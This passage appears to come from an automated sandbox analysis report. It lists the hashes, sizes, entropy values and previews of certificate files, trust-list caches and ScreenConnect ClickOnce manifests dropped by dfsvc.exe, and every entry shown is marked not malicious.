                                                                                                                                                                                                                                                  Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                  MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                  SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                  SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                  SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                  Entropy (8bit):7.562070540258883
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:5onfZSc5RlRtBfQwRhs5vCZgPVrVJEYbw7OIiVFQlb8PjcNCUAnqr/E:5i8cdZTRhG+gPZPfIgMb8PjcNCa/E
                                                                                                                                                                                                                                                  MD5:EB9A1D98CC4B6AC3D674A6621DF5A758
                                                                                                                                                                                                                                                  SHA1:5E9BC182D48B8E86A61D8A3F4B5ADD9C88DA6800
                                                                                                                                                                                                                                                  SHA-256:20D856D68DBA3E2246EBB62A5EAEDCEFDA221ACCFA1B9362B33AFAD33B6E48C7
                                                                                                                                                                                                                                                  SHA-512:1054D82E5E1B2F2C1416D31F01FF2C172ACA8DCC31A622CDD959F918B78A474BD9B40A9B7316122A8262FAC24D6236860E2EADD665030A61D56C5C0A153F81C7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                  Entropy (8bit):3.527255541181304
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kK6K8vF/aJmsN+SkQlPlEGYRMY9z+s3Ql2DUevat:iK4FdTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                  MD5:B8DA250B955455DA2C60717FC0C22805
                                                                                                                                                                                                                                                  SHA1:DC92AE48545A1175A4E09C974E96AC69C29ECE5D
                                                                                                                                                                                                                                                  SHA-256:D9E2AAE548FB4B709465DC59AE1FC5AFF0A68056579D2E3B93E20D059E2F4521
                                                                                                                                                                                                                                                  SHA-512:67C278AF84D1CDCA4E1DA51C7A116E84D4BFCEC996997CD4D2122AA7DA388FAC539AD10CD0E7A29CEB774259B958A0621D3E6A7492913DF8ADD72D161C1FF759
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... .........oq.a3..(..................................................<K2.. .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                  Entropy (8bit):3.2300897763107805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKf0rNtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XiqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                  MD5:72AD35824C698B9D90196D3E737C475C
                                                                                                                                                                                                                                                  SHA1:A4282692B0DEEE6CAF4236013AD69F1FEEA5A945
                                                                                                                                                                                                                                                  SHA-256:B542FB1EF072621349D1495D08E66E4E7F4DF2402A32A39E22980283378C6DCA
                                                                                                                                                                                                                                                  SHA-512:5B88B32F539B4CB43EFF6557B0A403B3DC453970AA15949C40933F0AD6540DBAA7D0EDE7BA7AF77A97F9E08036BDDD9489AB913EA1E1BC5EB2889DA5007BBA1C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ...........t.2..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                  Entropy (8bit):3.194931322323056
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kK7klfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:XtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                  MD5:E36CE6E88935DD78C8014277A34F968E
                                                                                                                                                                                                                                                  SHA1:99D3E35825BA2BF2DAC4900C1D5E04D6DECEAC49
                                                                                                                                                                                                                                                  SHA-256:16C05357BA825A6462A4A2224ED6A9457005658592D28ECFF2D23E27434F7026
                                                                                                                                                                                                                                                  SHA-512:D00144DB94872C35A879F96332EE9C5C7C0D965D0B02BE8B89BDB784338495F3D55834C7106A33DC81AD3D777122A98FE13C5C7FA01918FAC7D47C3FBC5B91F8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ..........T#-2..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                  Entropy (8bit):3.968277444337835
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:ZhJqk7ymxMiv8sFBSfamB3rbFURMOlAkr:BPymxxv7Sf13rbQJr
                                                                                                                                                                                                                                                  MD5:26FBAD6DE5DF50DBA12ECDA4DFBAD91E
                                                                                                                                                                                                                                                  SHA1:E36A2E77797DF5D9C7821A1CA70E0F83F0B5A931
                                                                                                                                                                                                                                                  SHA-256:00E04530932DB1A0FA0E4AC13B922B5C4A45620E0417A9748333AC8D5DC2F7C1
                                                                                                                                                                                                                                                  SHA-512:234EA08713858F3CEEF1C54191E27357498918D39315C9507A6D62CBB9C1234E92538B0033CE08C62F11E313CBECD2D0356D5BA5E48FAFE10AC553E8BB6B4D00
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ....(...Q..."2..(...................D1......6......................6.. ........X.7.1.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                  Entropy (8bit):3.0528988669712294
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKWLhLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:+NLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                  MD5:8804E82049FEE0001EA53237D972AD97
                                                                                                                                                                                                                                                  SHA1:38FE880B44CF09513222BC5514EA9D55330A98A0
                                                                                                                                                                                                                                                  SHA-256:A906F2BE97C74C8C14557C3478C6E7037C00C39AC4ADF52CFAB2B78666613C6A
                                                                                                                                                                                                                                                  SHA-512:B478F9B0CB9694C649AB86671866F692EEAB040D8233B3B8C8FDB2DC072EF714569E29A7431754ACDEE726506483B7400D4AEDD50F2B503DDDBEF2F692584B1D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ....l.....^..2..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25496
                                                                                                                                                                                                                                                  Entropy (8bit):5.615417083549069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:elqUkoGo26tX9DkX9R/QPIBM7YguPkuaCH7kLgOv0TcI/:esx626tX9DkX9R/QPI+0gu8uxHOgOvIR
                                                                                                                                                                                                                                                  MD5:4E30948F3FF7D1908072E8BA586B3DF8
                                                                                                                                                                                                                                                  SHA1:BAB0CBBE38B99AB51E54202E366A61667C0F5A8E
                                                                                                                                                                                                                                                  SHA-256:88146FDC8139E14021697F442BDA3499AA6C7B9A8E9CADAD0E745360B4E036E2
                                                                                                                                                                                                                                                  SHA-512:E247D160D9C74996FFA5AFD2B506DA3B1BBAB318820CBB34CB98D5EB1C9B7357C3FCAE9627435B8E7CCBC99A592122DD998D1C38D9DBCF1069465626CDDB52B6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                                  Entropy (8bit):4.193916446057946
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:lJ3uWWGeV+WwQXlmLLxDPoNV1TpzLhIYX:r3iJUHxDSTJNf
                                                                                                                                                                                                                                                  MD5:C9335262CF2AD960207E261B54AB6004
                                                                                                                                                                                                                                                  SHA1:EBB7F58314AE1E1B3A1AA9CB4B503646DC0C28A9
                                                                                                                                                                                                                                                  SHA-256:1930DDFE557C2FA46545ABD76C43B2DB811233B5BCAF8938FB9AF2BBAB549373
                                                                                                                                                                                                                                                  SHA-512:8873E334E047ADFEB72E895DF8823E56E62C57D47F0C888AD9D1BD3CCAE75C79D1304F51006E9D50A2C9EB8327130ED49DA3B698AE341DFA966E9FF3BF6F631A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH...........^.A.l#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................k...............................................k...............................................k...............................................k...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5260
                                                                                                                                                                                                                                                  Entropy (8bit):4.273635945286269
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:ENq6R84TeV+Ww7mk9O43jYHlIgBXC35dX1vMwnjIbm:sR84UJC9tUHlXBXEjd
                                                                                                                                                                                                                                                  MD5:5BE3E8251A12056385186DAA715E1ACE
                                                                                                                                                                                                                                                  SHA1:2415E041AFECF98F4B3FB6364ADE89148D916F14
                                                                                                                                                                                                                                                  SHA-256:636E0DEF4DF4202D5DE0A1AD809231E91AEAFD49B7D90D109DC91135CB7575B9
                                                                                                                                                                                                                                                  SHA-512:E0C25C96F77DE9AE4A58ECB32DDFD13E1D6A6AE32BACA6AE6760ED634544DBAB1E31CDA0F3224B2B94EF0728D26CE9DA32331D65A07B39DF9E130C55DBAEF823
                                                                                                                                                                                                                                                  Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1982
Entropy (8bit):5.057585371364542
Encrypted:false
SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:data
Category:dropped
Size (bytes):6588
Entropy (8bit):4.135225750015584
Encrypted:false
SSDEEP:96:zMmxLeV+WwwU8WpZ2LRheuMl2UfdVaMslksJqi/D5:nx8JwpZ2LRhyl5dVzLw75
MD5:4AEDE05B07476C5FE44D688235F3FCC0
SHA1:A62C3F3F798BB29BFDE9111B7FCCB176AF58B06F
SHA-256:30341AC5FE51A1C97BBE4DC26A721789E130B04552ED7257500035AA71880C82
SHA-512:DBBA1105E9910C07940C9EC49753468519C4F3AAE2BED037B9052DB6B508E6CF65E84607300306A366C8074897752AC8B74B1E621A6D165B6E890D71DC240EEE
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):2573
Entropy (8bit):5.026361555169168
Encrypted:false
SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:3133DE245D1C278C1C423A5E92AF63B6
SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:data
Category:dropped
Size (bytes):3032
Entropy (8bit):4.567688006237518
Encrypted:false
SSDEEP:48:7MQScvgFe6S+9oww7g47u2ehojqSJCVJzruPPtnwbb:7XSc6eV+WwwnleajpYruPPtnEb
MD5:5CC8B449186266E674F6AE7C98B6FD9A
SHA1:E9A3C3AB9F3043DCF2815BA6B8672DACD5E8C999
SHA-256:B1AC10F5B7674280268392D26FD8ADE5F29848429C7848777D65D2FBFB522BC8
SHA-512:AF92370A2B8D7AF1FC9C9656A86F40C26CAA85438822ACACF3969C22A275847DFA6F1A2C21598ACF8112D826983FA691C80ECD88165C5289D96371B722356765
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1041
Entropy (8bit):5.147328807370198
Encrypted:false
SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:data
Category:dropped
Size (bytes):14612
Entropy (8bit):5.744910745597779
Encrypted:false
SSDEEP:192:QWh4+9n9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoy5oFOR:QWx9qS6VTX9dX9R/QPIBM7Yy2Fq
MD5:97FEF1F16DFFBF51DE83D469D62E1D45
SHA1:491BB26CE0225525F92572E7DCFF3242DEFA170D
